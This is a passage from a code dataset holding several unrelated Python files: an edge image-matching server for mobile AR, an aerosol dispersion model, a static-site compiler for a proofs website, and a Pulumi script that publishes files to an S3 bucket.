isfile, join\nfrom queue import Queue\n\nHOST = '0.0.0.0'\nUSER_PORT = 9001\nREST_PORT = USER_PORT + 1000\n\nSIZE = 100 # number of comparing images\nSOCKET_TIME_OUT = 10\nINFOS = [1] # ms rtt\nFOLDER = 'images/'\nCWD = os.getcwd()\nTRAFFIC = 1.0\n\nUSERS = {} # store the user id, socket, queue\n\nserver = FlaskAPI(__name__)\n\n@server.route(\"/\", methods=['GET', 'POST', 'PUT'])\ndef function():\n global INFOS, TRAFFIC\n if request.method in ['POST', 'PUT']:\n traffic = str(request.data.get('traffic', ''))\n try:\n TRAFFIC = float(traffic)\n print(\"traffic: \", TRAFFIC)\n except: \n pass\n\n perf = str(request.data.get('perf', ''))\n try:\n INFOS.append(float(perf))\n print(\"perf: \", float(perf))\n except: \n pass\n \n return str(TRAFFIC), status.HTTP_202_ACCEPTED # return traffic, directly to UE \n else:\n useful_len = int(len(INFOS)*0.8) # last 50%\n avg_data = int(100*np.mean(INFOS[useful_len:]))/100 # get average \n INFOS = [INFOS[-1]] # reset the data\n # reset queue of all users\n for key, user in USERS.items():\n id, _, the_queue = user\n with the_queue.mutex: the_queue.queue.clear() # clear all\n print(\"clear queue for user: \", id, the_queue.qsize())\n\n return str(avg_data), status.HTTP_200_OK\n\n\ndef recv_image_from_socket(client, buffers):\n start_time = time.time() # time when recv starts\n # print(\"start buffers len: \", len(buffers))\n \n while len(buffers) < 8:\n try:\n buf = client.recv(1024)\n except:\n return False, 0, b''\n buffers += buf\n # if recv too long, then consider this user is disconnected\n if time.time() - start_time >= 
SOCKET_TIME_OUT:\n return False, 0, b''\n \n img_size_byte_pkt = buffers[:4] # here buffer could larger than 4 len\n img_id_byte_pkt = buffers[4:8] # here buffer could larger than 4 len\n buffers = buffers[8:] # here buffer could larger than 4 len\n\n size, = struct.unpack('!i', img_size_byte_pkt)\n id, = struct.unpack('!i', img_id_byte_pkt)\n # print(\"packet to be recvd: \", size)\n # print(\"middle remains len: \", len(buffers))\n\n while len(buffers) < size:\n try:\n buf = client.recv(1024)\n except:\n return False, 0, b''\n buffers += buf\n # if recv too long, then consider this user is disconnected\n if time.time() - start_time >= SOCKET_TIME_OUT:\n return False, 0, b''\n\n image_data = buffers[:size]\n buffers = buffers[size:]\n\n # print(\"late remains len: \", len(buffers))\n imgdata = np.frombuffer(image_data, dtype='uint8')\n frame = cv2.imdecode(imgdata, 1)\n\n return frame, id, buffers\n\n\ndef process(feature_extractor, matcher, image, database):\n\n latent = feature_extractor.inference(image) \n obj_id = sub_process_matching(latent, database, matcher)\n\n return obj_id\n\n\nclass ORB:\n def __init__(self,):\n # Initiate ORB detector\n self.orb = cv2.ORB_create()\n # the default edgethreshold is 31, cannot detect keypoints\n # which is not suitable for small cropped image\n # reduce this value can apply to small image\n\n def inference(self, img):\n # find the keypoints with ORB\n kp = self.orb.detect(img, None)\n # compute the descriptors with ORB\n kp, des = self.orb.compute(img, kp)\n \n if des is None:\n # if no feature detected, then randomly generated 100 features.\n des = np.random.randint(0, 100, (100, 32), dtype=np.uint8)\n\n des = des[:100] # max number of features\n\n return des\n\n\ndef sub_process_matching(features, database, matcher):\n # given an object (loc, latent), find the corresponding object in global_database\n # the geo-distance should be smaller than NEARBY_DIST, and then find the minimum latent one\n # if not found, then report a new object detected.\n obj_id, min_aug_dist = 0, 1e9\n\n for key, latent in database.items():\n # where latent vector could be just a vector or a multi-vector due to orb detection \n matches = matcher.match(latent, features) # store the latent dist\n avg_distance = np.mean([match.distance for match in matches])\n \n if avg_distance <= min_aug_dist: # if geo loc is nearby and aug-distance is smaller\n min_aug_dist = avg_distance\n obj_id = key\n\n return obj_id\n\n\ndef start_rest_api():\n server.run(host=HOST,port=REST_PORT)\n print('completed!')\n\n\ndef service_thread(user,):\n id, client, img_queue = user\n\n feature_extractor = ORB()\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n\n while True:\n try: # try to get image from image queue\n\n recv_time, frame_id, frame = img_queue.get() # by default block=True\n\n start_time = time.time()\n\n match_id = process(feature_extractor, matcher, frame, database) # process the img\n\n result_str = str(match_id) + '\\n' # prepare data\n\n client.sendall(result_str.encode()) # send back to client\n\n encode_recv_id = (str(frame_id)+'\\n').encode() # the size of first packet\n\n client.sendall(encode_recv_id) # send packet id recv before\n\n send_time = int(1000*(time.time() - start_time))/1000\n if send_time > 1: print(\"process time (s): \", send_time, flush=True)\n\n except: # otherwise pass\n pass\n\n\ndef user_thread(user,):\n global USERS\n id, client, img_queue = user\n \n X = threading.Thread(target = service_thread, args=(user,))\n X.setDaemon(True)\n 
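`recv_image_from_socket` above expects a simple length-prefixed frame: a 4-byte big-endian payload size, a 4-byte big-endian frame id, then the JPEG bytes. A matching client-side sender might look like this (hypothetical helper, not part of the repository):

```python
import struct
import cv2

def send_image(sock, frame, frame_id: int):
    ok, buf = cv2.imencode('.jpg', frame)   # encode the numpy frame as JPEG
    payload = buf.tobytes()
    header = struct.pack('!i', len(payload)) + struct.pack('!i', frame_id)
    sock.sendall(header + payload)          # 4-byte size, 4-byte id, then data
```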
X.start()\n\n buffers = b''\n # if client connected, keeping processing its data\n while True:\n frame, frame_id, buffers = recv_image_from_socket(client, buffers) # receive from client\n \n if frame is False:\n USERS.pop(id, None) # remove the user\n print(\"droped client id: \", id)\n break\n \n recv_time = time.time()\n if img_queue.full(): img_queue.get() # if the queue is full, pop out the first one\n img_queue.put((recv_time, frame_id, frame)) # put into image queue and recv time stamp\n # print('recv id', frame_id, flush=True)\n\n client.close()\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n max_img_numbers = 100\n elif len(sys.argv) == 2:\n max_img_numbers = int(sys.argv[1])\n else:\n raise ValueError\n\n # start rest api server\n t1 = threading.Thread(target = start_rest_api)\n t1.setDaemon(True)\n t1.start()\n\n # bind to port to accept client\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.bind((HOST,USER_PORT))\n s.listen(1000)\n\n # global_database = {}\n # # get all images\n # images = [cv2.imread(FOLDER+f) for f in listdir(FOLDER) if isfile(join(FOLDER, f))]\n\n # # save to global images\n # for i, img in enumerate(images):\n # latent = feature_extractor.inference(img)\n # global_database[str(i)] = latent\n\n # with open('global_database.pkl', 'wb') as handler:\n # pickle.dump(global_database, handler)\n #### handle different folders #####\n\n try:\n with open(CWD+'/offloading_servers/global_database.pkl', 'rb') as handler:\n global_database = pickle.load(handler)\n except: pass \n try:\n with open('global_database.pkl', 'rb') as handler:\n global_database = pickle.load(handler)\n except: pass \n\n database = {}\n for key, val in global_database.items():\n database[key] = val # get the value\n if len(database)>=max_img_numbers: break\n\n print('database length is ', len(database)) # if no global_database loaded, then report error\n\n idx = 0\n # main loop for all incoming client\n while True:\n print(\"waiting for client connection...\")\n client_sock, addr = s.accept() # accept client\n user_id = str(idx)\n user = (user_id, client_sock, Queue(1000))\n USERS[user_id] = user\n print (\"new user socket id: \", user_id)\n idx += 1\n\n X = threading.Thread(target = user_thread, args=(user,))\n X.setDaemon(True)\n X.start()\n \n \n\n\n ","repo_name":"int-unl/End-to-End-Slicing","sub_path":"edge_application/asyn_mar_server.py","file_name":"asyn_mar_server.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"31790571920","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 11 18:48:46 2023\n\n@author: akimlavrinenko\n\"\"\"\n\nimport numpy as np #import numpy as np, to enable numpy arrays and numpy meshgrid\nimport matplotlib.pyplot as plt #import matplotlib.pyplot as plt to plot graphs\nfrom scipy.signal import fftconvolve #import convolve function from scipy.signal library\nimport time as timer\n\nstart = timer.time()\n#Parameters values -- User inputs floats\ntime = 50#event duration, in seconds\nt_inj = 0.4 #inhection duration, in seconds\ndelta_t = 0.1 #(s) time-steps\n\ndelta_x = 0.1 #(m) mesh-size\n\nl = 3.14 #x-length (m) of room\nw = 3.14 #y-length (m) of room\nh = 3.14 #z-length (m) of room\n\nx_o = 1 #x-coordinate of source\ny_o = 1.57 #y-coordinate of source\n\nv = 0.0856 #air velocity (m/s) from left to right. 
\nR = 1370 #aerosol emission rate (particles/s)\nQ = 0 #0.002 # Air exchange rate (s^-1)\n# K = 5e-3 #0.0053 # Eddy diffusion coefficient (m^2/s)\nd = 0 #1.7*10**(-4) #deactivation rate (s^-1)\ns = 0 # 1.1*10**(-4) #settling rate (s^-1)\n\n#set up mesh\nn_x = int(l / delta_x) + 1 #int: calculate number of x-steps\nn_y = int(w / delta_x) + 1 #int:calculate number of y-steps\nx = np.linspace(0,l,n_x) #define numpy array for x-axis\ny = np.linspace(0,w,n_y) #define numpy array for y-axis\nX,Y = np.meshgrid(x,y) #define numpy meshgrid for X,Y\n #Initialise numpy array of same size as X for C (the concentration)\n\n\nvmax = 1\nlevels = np.linspace(0, vmax, n_x+1)\n\n\nt_end = time\nn_t = int(t_end/delta_t)\nt_arr = np.asarray(np.linspace(delta_t,t_end,n_t))\n\n\n\nklist = [1e-1,1e-2,1e-3,1e-4]\ncolorlist = ['r','b','k','m','c','y']\nfor K in klist:\n sigmalist = []\n sigmaTsigma0list = []\n reslist = []\n t1sumsum = []\n term1temp = []\n term2temp = []\n term3temp = []\n\n for t in range(0,len(t_arr)):\n print('_____________________________________________________________')\n print(round(t_arr[t],3))\n m = int(v/(2*l)*t) \n t1 = np.zeros_like(X)\n t2 = np.zeros_like(Y)\n t1sum = []\n for i in range(len(x)):\n for j in range(len(y)):\n \n t1[i][j] = np.exp(-((X[i][j]-x_o-v*t_arr[t])**2)/(4*K*t_arr[t])) + np.exp(-((X[i][j]+x_o+v*t_arr[t])**2)/(4*K*t_arr[t]))\n t2[i][j] = np.exp(-((Y[i][j]-y_o)**2)/(4*K*t_arr[t])) + np.exp(-((Y[i][j]+y_o)**2)/(4*K*t_arr[t]))\n for n in range(1,m+1):\n t1[i][j] += np.exp(-((X[i][j]-x_o-v*t_arr[t] + 2*n*l)**2)/(4*K*t_arr[t])) + np.exp(-((X[i][j]+x_o+v*t_arr[t] - 2*n*l)**2)/(4*K*t_arr[t]))\n t1[i][j] += np.exp(-((X[i][j]-x_o-v*t_arr[t] - 2*n*l)**2)/(4*K*t_arr[t])) + np.exp(-((X[i][j]+x_o+v*t_arr[t] + 2*n*l)**2)/(4*K*t_arr[t]))\n for n in range(1,4):\n t2[i][j] += np.exp(-((Y[i][j]-y_o - 2*n*w)**2)/(4*K*t_arr[t])) + np.exp(-((Y[i][j]+y_o + 2*n*w)**2)/(4*K*t_arr[t]))\n t2[i][j] += np.exp(-((Y[i][j]-y_o + 2*n*w)**2)/(4*K*t_arr[t])) + np.exp(-((Y[i][j]+y_o - 2*n*w)**2)/(4*K*t_arr[t]))\n \n t3 = np.exp(-(Q+d+s)*t_arr[t])\n \n term1temp.append(t1)\n term2temp.append(t2)\n term3temp.append(t3)\n \n term1tempArr = np.dstack(term1temp)\n term2tempArr = np.dstack(term2temp)\n \n term1tempArr[np.isnan(term1tempArr)] = 0\n term2tempArr[np.isnan(term2tempArr)] = 0\n \n S = np.full(np.shape(term1temp)[0], R)*delta_t\n C = np.zeros_like(X)\n \n integlist = []\n \n for i in range(len(x)):\n for j in range(len(y)):\n integ = 1/(4*np.pi*K*t_arr[:t+1]) * term1tempArr[0,i,:] * term2tempArr[j,0,:] * term3temp[:t+1]\n C[j][i] = fftconvolve(S,integ,mode='valid') / (h/2) #* delta_x**2\n \n reslist.append(C)\n cc = np.unravel_index(C.argmax(), C.shape)\n ccc = np.subtract(np.asarray(t1.shape),1)/2\n \n if t_arr[t] > t_inj:\n sigma = np.zeros_like(X)\n itemindex = np.where(t_arr == t_inj+delta_t)\n C = np.subtract(reslist[t],reslist[t-itemindex[0][0]])\n C[C<0] = 0\n cc_max = np.unravel_index(C.argmax(), C.shape)\n \n Cinf = sum(sum(C))*delta_x**2 / (l*w)\n for i in range(len(x)):\n for j in range(len(y)):\n sigma[j][i] = (C[j][i] - Cinf)**2\n \n sigma = np.sqrt(sum(sum(sigma)) / (n_x*n_y))\n print('sigma: ', sigma)\n sigmalist.append(sigma)\n \n \n print('ps', sum(sum(C))/(l*w),'|', 'max value: ',cc_max, C[cc_max[0]][cc_max[1]])\n diff0 = abs(C[cc_max[0]][cc_max[1]] - C[0,0])\n diff1 = abs(C[cc_max[0]][cc_max[1]] - C[0,np.asarray(t1.shape)[0]-1])\n diff2 = abs(C[cc_max[0]][cc_max[1]] - C[np.asarray(t1.shape)[0]-1,0])\n diff3 = abs(C[cc_max[0]][cc_max[1]] - C[np.asarray(t1.shape)[0]-1, 
np.asarray(t1.shape)[0]-1])\n \n\n if K == klist[0]:\n linestyle = 'o'\n label = 'K = ' + str(klist[0])\n color = 'k'\n elif K == klist[1]:\n linestyle = 's'\n label = 'K = ' + str(klist[1])\n color = 'r'\n elif K == klist[2]:\n linestyle = '*'\n label = 'K = ' + str(klist[2])\n color = 'b'\n elif K == klist[3]:\n linestyle = 'v'\n label = 'K = ' + str(klist[3])\n color = 'c'\n elif K == klist[4]:\n linestyle = \"^\"\n label = 'K = ' + str(klist[4])\n color = 'y'\n \n if t_arr[t] == t_inj+delta_t:\n sss = sigmalist[t-itemindex[0][0]]/sigmalist[0]\n sigmaTsigma0list.append(sss)\n plt.plot(t_arr[t], sss, marker = linestyle, color = color, markersize = 3, label = label)\n elif t_arr[t] > t_inj+delta_t:\n sss = sigmalist[t-itemindex[0][0]]/sigmalist[0]\n sigmaTsigma0list.append(sss)\n plt.plot(t_arr[t], sss, marker = linestyle, color = color, markersize = 3)\n end = timer.time()\n print('loop time ', round(end - start, 3), 's')\n \n res = np.asarray([t_arr[4:],sigmaTsigma0list]).T\n np.savetxt('./sigma_' + str(K) + '.dat', res)\n \nplt.ylabel('sigma[t]/sigma[t=0.4]')\nplt.xlabel('t, s')\nplt.legend(loc=\"upper right\")\nplt.ylim(0,1.1)\nplt.savefig('./sigma2.png', dpi = 200)\nplt.show()\n \n \ndef chunkIt(seq, num):\n avg = len(seq) / float(num)\n out = []\n last = 0.0\n\n while last < len(seq):\n out.append(seq[int(last):int(last + avg)])\n last += avg\n\n return out\n\n\n","repo_name":"Akimlav/dispersion","sub_path":"sigma_Lau_model.py","file_name":"sigma_Lau_model.py","file_ext":"py","file_size_in_byte":6661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37086910336","text":"import re\nimport markdown\nimport time\n\nfrom FileMgr import FileMgr\nfrom BopSource import BopSource, BopLayouts\nfrom BopReferences import BopReferences\nfrom BopValidator import BopValidator\nfrom BopIndexCompiler import BopIndexCompiler\nfrom BopValidationError import BopValidationError\n\n\nclass BopCompiler:\n local = False\n verbose = False\n generate_indices_locally = False # defaults to False, when local == True\n\n # (this will skip index generation to improve performance of compilation)\n # If amended to True, please set to False again when checking in a pull request.\n\n def __init__(self):\n self.fm = FileMgr()\n self.templates = dict()\n self._main_template = \"\"\n self.sources = dict()\n self.indices = dict()\n self._source_references = None\n self.references = None\n self._source_licenses = list()\n self._source_licenses_ids = set()\n self._load_templates()\n self._validator = None\n self._index_compiler = None\n\n def _load_templates(self):\n templates = self.fm.get_folder_content(\"_compile/_templates\")\n for template in templates:\n self.templates[template] = self.fm.get_file_content(\"_compile/_templates\", template)\n\n def compile(self):\n self.fm.clear_docs()\n self._main_template = self.templates[\"main.html\"]\n self._main_template = self._main_template.replace(\"{{ meta }}\", self.templates[\"meta.html\"])\n self._main_template = self._main_template.replace(\"{{ header }}\", self.templates[\"header.html\"])\n self._main_template = self._main_template.replace(\"{{ footer }}\", self.templates[\"footer.html\"])\n self._compile_sources()\n self._compile_assets()\n\n def _compile_sources(self):\n self.prepare_all_sources()\n self.references = BopReferences(self._source_references, self._source_licenses)\n self._validate_all_sources()\n self._making_all_indices()\n self._render_all_sources()\n if BopCompiler.local:\n 
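In the dispersion script above, `fftconvolve(S, integ, mode='valid')` superposes the puff response over the emission history: with `len(S) == len(g) == N`, 'valid' mode returns the single value sum_k S[k] * g[N-1-k]. A small self-contained check of that identity (stand-in kernel; same R * delta_t source scaling as in the script):

```python
import numpy as np
from scipy.signal import fftconvolve

dt = 0.1
t = np.arange(dt, 5 + dt, dt)
g = np.exp(-t) / np.sqrt(4 * np.pi * 0.01 * t)  # stand-in puff response
S = np.full(len(t), 1370.0) * dt                # emission rate R times delta_t

direct = sum(S[k] * g[len(t) - 1 - k] for k in range(len(t)))
via_fft = fftconvolve(S, g, mode='valid')[0]
assert np.isclose(direct, via_fft)
```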
self._make_local()\n self._write_compiled_sources()\n self._write_sitemap()\n\n def _make_local(self):\n print(\" Making sources local...\")\n for source in self.sources:\n bop_source = self.sources[source]\n content_replaced = bop_source.get_compiled_content()\n project_root = str(FileMgr.get_project_folder()).replace(\"\\\\\", \"/\")\n content_replaced = content_replaced.replace(BopSource.url_root, project_root + \"/docs\")\n # replace image urls starting with the root url to local\n content_replaced = content_replaced.replace(BopSource.url_images, project_root + \"/_sources\")\n bop_source.set_compiled_content(content_replaced)\n\n def _write_compiled_sources(self):\n print(\"Writing compiled sources...\")\n for source in self.sources:\n bop_source = self.sources[source]\n if bop_source.layout != BopLayouts.hidden:\n file_destination = bop_source.get_file_destination()\n self.fm.write_file(file_destination, bop_source.name + \".html\", bop_source.get_compiled_content())\n\n def _render_references(self, bop_source: BopSource):\n references_md = \"
\\n\"\n has_references = False\n has_footnotes = False\n licenses = self.references.get_licenses_for_bop_source(bop_source)\n if len(licenses) > 0:\n references_md += \"### References\\n\"\n for lic in licenses:\n has_references = True\n bop_license = licenses[lic]\n references_md += \"\\n#### \" + bop_license.license_source.title + \"\\n\\n\"\n for reference_id in bop_license.references:\n references_md += \"1. \" + bop_license.references[reference_id] + \"\\n\"\n body_of_reference = bop_license.license_source.get_body()\n if body_of_reference != \"\":\n references_md += \"\\n\" + body_of_reference + \"\\n\"\n\n if re.search(r\"\\[\\^.*?\\]\", bop_source.get_pre_body() + \"\\n\" + bop_source.get_body()):\n has_references = True\n has_footnotes = True\n if has_footnotes:\n references_md += \"\\n#### Footnotes\\n\"\n if has_references:\n return references_md\n else:\n return \"\"\n\n def _get_contributors(self, bop_source):\n cc_by_sa = self.references.get_cc_by_sa()\n references_md = \"
\\n\"\n\n improve_this_site_html = \" {3}\".format(\n 'improve this site',\n BopSource.url_images,\n bop_source.get_file_destination() + \"/\" + bop_source.name + \".md\",\n \"\".format(BopSource.url_images))\n improvement_history_html = \" {3}\".format(\n 'improvement history',\n BopSource.url_commits,\n bop_source.get_file_destination() + \"/\" + bop_source.name + \".md\",\n \"\".format(BopSource.url_images))\n references_md += \"{0}[{1}][ccbysa]! {2} {3}
\".format(\n \"Thank you to the contributors under \", \"CC BY-SA 4.0\", improve_this_site_html,\n improvement_history_html)\n references_md += bop_source.get_contributors()\n references_md += \"
\\n\\n\"\n references_md += \"[ccbysa]:\" + cc_by_sa.publisher + \"\\n\"\n return references_md\n\n def prepare_all_sources(self):\n print(\"Preparing all sources...\")\n sources = self.fm.get_folder_content_rek()\n for file in sources:\n if \"_sources/_references/references.md\" in file:\n bop_source = BopSource(file)\n self._source_references = bop_source\n elif \"_sources/_licenses\" in file:\n bop_source = BopSource(file)\n self._source_licenses.append(bop_source)\n if bop_source.nodeid in self._source_licenses_ids:\n raise BopValidationError(\"LICENSE\", \"01\",\n \"Duplicate license \" + bop_source.nodeid + \" in \" +\n bop_source.get_file_name())\n else:\n self._source_licenses_ids.add(bop_source.nodeid)\n else:\n bop_source = BopSource(file)\n self.sources[file] = bop_source\n\n def _validate_all_sources(self):\n print(\"Validating sources...\")\n self._validator = BopValidator(self.sources)\n self._index_compiler = BopIndexCompiler(self._validator)\n\n def _making_all_indices(self):\n if not self.local:\n self.__making_all_indices()\n else:\n if self.generate_indices_locally:\n self.__making_all_indices()\n else:\n print(\" Skipping local compilation of all index html files for performance reasons.\")\n\n def __making_all_indices(self):\n print(\" Making tree index\")\n self.indices[\"{{ tree-index }}\"] = self._index_compiler.get_tree_index()\n print(\" Making building block index\")\n self.indices[\"{{ bb-index }}\"] = self._index_compiler.get_building_block_index()\n self.indices[\"{{ bbo-index }}\"] = self._index_compiler.get_other_building_block_index()\n self.indices[\"{{ bbh-index }}\"] = self._index_compiler.get_history_building_block_index()\n print(\" Making issue index\")\n self.indices[\"{{ q-index }}\"] = self._index_compiler.get_issue_index()\n print(\" Making contributors index (github users)\")\n self.indices[\"{{ cg-index }}\"] = self._index_compiler.get_github_contributors_index()\n print(\" Making contributors index (non-github users)\")\n self.indices[\"{{ cng-index }}\"] = self._index_compiler.get_non_github_contributors_index()\n print(\" Making interactive widgets index\")\n self.indices[\"{{ w-index }}\"] = self._index_compiler.get_widgets_index()\n print(\" Making sourcecode index\")\n self.indices[\"{{ sc-index }}\"] = self._index_compiler.get_sourcecode_index()\n print(\" Making person index (by name)\")\n self.indices[\"{{ pbn-index }}\"] = self._index_compiler.get_person_index_by_name()\n print(\" Making person index (by birth year)\")\n self.indices[\"{{ pby-index }}\"] = self._index_compiler.get_person_index_by_birth_year()\n print(\" Making person index (by tag)\")\n self.indices[\"{{ pbt-index }}\"] = self._index_compiler.get_person_index_by_tag()\n print(\" Making keywords index\")\n self.indices[\"{{ ii-index }}\"] = self._index_compiler.get_keywords_index()\n\n def _render_all_sources(self):\n print(\"Rendering sources...\")\n self._render_all_references()\n self._render_all_tocs()\n self._render_all_markdowns()\n\n def _render_all_tocs(self):\n print(\" Rendering tables of content\")\n pc = self._validator.get_parent_child_graph()\n nodes = self._validator.get_nodes()\n for parentid in pc:\n self.__create_toc(parentid, self.__collect_children_for_toc(pc, nodes, parentid), nodes)\n\n def __collect_children_for_toc(self, pc: dict, nodes: dict, parentid: str):\n distinct_related_tocs = dict()\n pc[parentid].sort(key=self._validator.get_order_id)\n for child in pc[parentid]:\n bop_source = nodes[child]\n if bop_source.layout in 
BopSource.related_layouts:\n title = BopSource.get_plural_layout_title(bop_source.layout)\n if title not in distinct_related_tocs:\n distinct_related_tocs[title] = list()\n distinct_related_tocs[title].append(child)\n else:\n if bop_source.title in distinct_related_tocs:\n raise AssertionError(\"Title '{0}' used in {1} was already used among siblings {2}\".format(\n bop_source.title,\n bop_source.get_file_name(),\n str(distinct_related_tocs[bop_source.title])\n ))\n else:\n distinct_related_tocs[bop_source.title] = bop_source\n return distinct_related_tocs\n\n def __create_toc(self, parentid: str, distinct_related_tocs: dict, nodes: dict):\n toc = \"\"\n bop_source = nodes[parentid]\n if bop_source.layout not in [BopLayouts.default, BopLayouts.index, BopLayouts.hidden]:\n toc += \"\\n\\n\"\n # first, create a toc of related nodes\n for title in distinct_related_tocs:\n if isinstance(distinct_related_tocs[title], list):\n toc += title + \": \"\n counter = 0\n for node_id in distinct_related_tocs[title]:\n counter += 1\n bop_source1 = nodes[node_id]\n toc += \"<a href='{0}'>{1}</a> \".format(bop_source1.url(), counter)\n # now, create a list of other subnodes\n toc += \"\\n\\n\"\n counter = 0\n for title in distinct_related_tocs:\n if isinstance(distinct_related_tocs[title], BopSource):\n counter += 1\n bop_source1 = distinct_related_tocs[title]\n toc += str(counter) + \". <a href='{0}'>{1}</a>\\n\".format(bop_source1.url(),\n bop_source1.get_plane_long_title())\n bop_source.set_toc(toc)\n\n def _render_all_references(self):\n print(\" Rendering references\")\n for source in self.sources:\n bop_source = self.sources[source]\n if bop_source.layout != BopLayouts.default:\n references_md = self._get_contributors(bop_source)\n references_md += self._render_references(bop_source)\n bop_source.set_references_md(references_md)\n\n def _render_all_markdowns(self):\n print(\" Rendering markdowns\")\n for source in self.sources:\n start_time = time.time()\n bop_source = self.sources[source]\n content_replaced = self._replace_template(self._main_template, bop_source)\n if bop_source.parent is not None and bop_source.parent.nodeid == 'bookofproofs$i':\n content_replaced = self._replace_indices(content_replaced)\n bop_source.set_compiled_content(content_replaced)\n if BopCompiler.verbose:\n print(\" {0}s: {1}\".format(\"%.2f\" % (time.time() - start_time), source))\n\n def _replace_indices(self, content_replaced: str):\n for index in self.indices:\n content_replaced = content_replaced.replace(index, self.indices[index])\n return content_replaced\n\n def _replace_template(self, content, bop_source):\n body = \"\"\n if len(bop_source.categories) > 0:\n body += bop_source.get_categories_links() + \"\\n\"\n body += bop_source.get_content_of_node() + \"\\n\"\n body += bop_source.get_toc() + \"\\n\"\n if bop_source.layout == BopLayouts.person:\n body += bop_source.get_relevant_tags_html() + \"\\n\"\n body += bop_source.get_referencing_nodes_html() + \"\\n\"\n body += bop_source.get_references_md()\n body += bop_source.get_link_references()\n\n content_replaced = content.replace(\"{{ body }}\",\n markdown.markdown(body, tab_length=2,\n extensions=['pymdownx.magiclink', 'tables', 'footnotes',\n 'def_list']))\n content_replaced = self._make_tables_responsive(content_replaced)\n content_replaced = content_replaced.replace(\"{{ keywords }}\", \",\".join(bop_source.keywords))\n content_replaced = content_replaced.replace(\"{{ description }}\", bop_source.description)\n content_replaced = content_replaced.replace(\"{{ title }}\", bop_source.title)\n 
content_replaced = self._replace_scripts(content_replaced, bop_source)\n content_replaced = self._escape_mathjax(r'(\\$.*?\\$)', content_replaced)\n content_replaced = self._escape_mathjax(r'(\\\\\\(.*?\\\\\\))', content_replaced)\n content_replaced = self._escape_mathjax(r'(\\\\\\[.*?\\\\\\])', content_replaced)\n return content_replaced\n\n def _compile_assets(self):\n print(\"Compiling assets...\")\n self._compile_sub_assets(\"css\")\n self._compile_sub_assets(\"js\")\n self._compile_sub_assets(\"jquery-ui\")\n self.fm.copy_folder(\"../_sources/_assets/jquery-ui/images\", \"../docs/assets/jquery-ui/images\")\n # Do not uncomment this. To save storage, we will store images only once in the source github repository\n # but not as a duplicate in the docs folder store. As a convention, all images' urls will refer to the source\n # self.fm.copy_folder(\"../_sources/_assets/images\", \"../docs/assets/images\")\n self.fm.copy_file(\"../_sources/_assets/images/fav.ico\", \"../docs/fav.ico\")\n # google site verification\n self.fm.copy_file(\"../_sources/_assets/other/google5e9ab19be7343012.html\",\n \"../docs/google5e9ab19be7343012.html\")\n # fpl syntax diagrams\n self.fm.copy_file(\"../_sources/_assets/other/FPLSyntaxDiagrams.xhtml\", \"../docs/FPLSyntaxDiagrams.html\")\n\n def _compile_sub_assets(self, sub):\n sub_contents = self.fm.get_folder_content(\"_sources/_assets/\" + sub)\n for file in sub_contents:\n content = self.fm.get_file_content(\"_sources/_assets/\" + sub, file)\n if file == \"bop.js\":\n search_links = self._index_compiler.get_search_autocomplete_index()\n content = content.replace(\"{{ search-links }}\", search_links)\n content = content.replace(\"{{ url }}\", BopSource.url_root)\n if BopCompiler.local:\n project_root = \"file:///\" + str(FileMgr.get_project_folder()).replace(\"\\\\\", \"/\")\n content = content.replace(BopSource.url_root, project_root + \"/docs\")\n self.fm.write_file(\"assets/\" + sub, file, content)\n\n @staticmethod\n def _make_tables_responsive(content: str):\n pattern = re.compile(r\"(.*<\\/table>)\", flags=re.S)\n replaced = re.sub(pattern, r\"
<div class='table-responsive'>\\1</div>
\", content)\n return replaced\n\n def _replace_scripts(self, content: str, bop_source: BopSource):\n pattern = re.compile(r'<p>(§§§\\d+)</p>')\n for match in pattern.finditer(content):\n key = match.group(1)\n if key in bop_source.scripts:\n script = bop_source.scripts[key]\n if bop_source.script_has_python(script):\n script = markdown.markdown(script, tab_length=3,\n extensions=['codehilite', 'fenced_code'])\n else:\n script = re.sub(r\"(^```[a-z]*$)\", r\"\", script, flags=re.M)\n content = content.replace(\"<p>\" + key + \"</p>
\", \"\\n\" + script + \"\\n\")\n else:\n AssertionError(\"Script key {0} not found in {1}\".format(key, bop_source.get_file_name()))\n return content\n\n def _escape_mathjax(self, pattern_string: str, content: str):\n pattern = re.compile(pattern_string, flags=re.S)\n new_content = content\n for match in pattern.finditer(content):\n new_content = new_content.replace(\"\" + match.group(1) + \"\", match.group(1))\n return new_content\n\n def _write_sitemap(self):\n sitemaps = list()\n for source in self.sources:\n bop_source = self.sources[source]\n if bop_source.layout not in [BopLayouts.hidden, BopLayouts.default]:\n url = bop_source.url()\n if url == \"https://bookofproofs.github.io/index.html\":\n url = \"https://bookofproofs.github.io/\"\n sitemaps.append(url)\n elif \"https://bookofproofs.github.io/branches/\" in url or \\\n \"https://bookofproofs.github.io/history/\" in url:\n sitemaps.append(url)\n sitemaps.sort(key=lambda x: len(x))\n sitemap = \"\\n\".join(sitemaps)\n self.fm.write_file(\"\", \"sitemap.txt\", sitemap)\n\n def get_validator(self):\n return self._validator\n","repo_name":"bookofproofs/bookofproofs.github.io","sub_path":"_compile/BopCompiler.py","file_name":"BopCompiler.py","file_ext":"py","file_size_in_byte":18666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39452130391","text":"import pulumi, os, mimetypes\nimport pulumi_aws as aws\n\nconfig = pulumi.Config()\nsite_dir = config.require(\"siteDir\") # requiring the config variable\n\nbucket = aws.s3.Bucket(\"my-bucket\",\n website={\n \"index_document\": \"index.html\"\n }\n)\n# bucket = aws.s3.Bucket(\"my-bucket\", bucket=\"this is a the name that AWS bucket is going to have\")\n\nfor file in os.listdir(site_dir):\n filePath = os.path.join(site_dir, file) # getting the html from the folder\n mime_type, _ = mimetypes.guess_type(filePath)# guess the mimetype of the file, python library\n obj = aws.s3.BucketObject(file, # making the bucket object\n bucket=bucket.id,\n source=pulumi.FileAsset(filePath),\n acl=\"public-read\", # making it so that public can see it\n content_type = mime_type\n )\n\npulumi.export(\"bucket_name\", bucket.id) # this is to show the output\npulumi.export(\"bucket_endpoint\", pulumi.Output.concat(\"http://\", bucket.website_endpoint)) # this is way to interpolation of string value 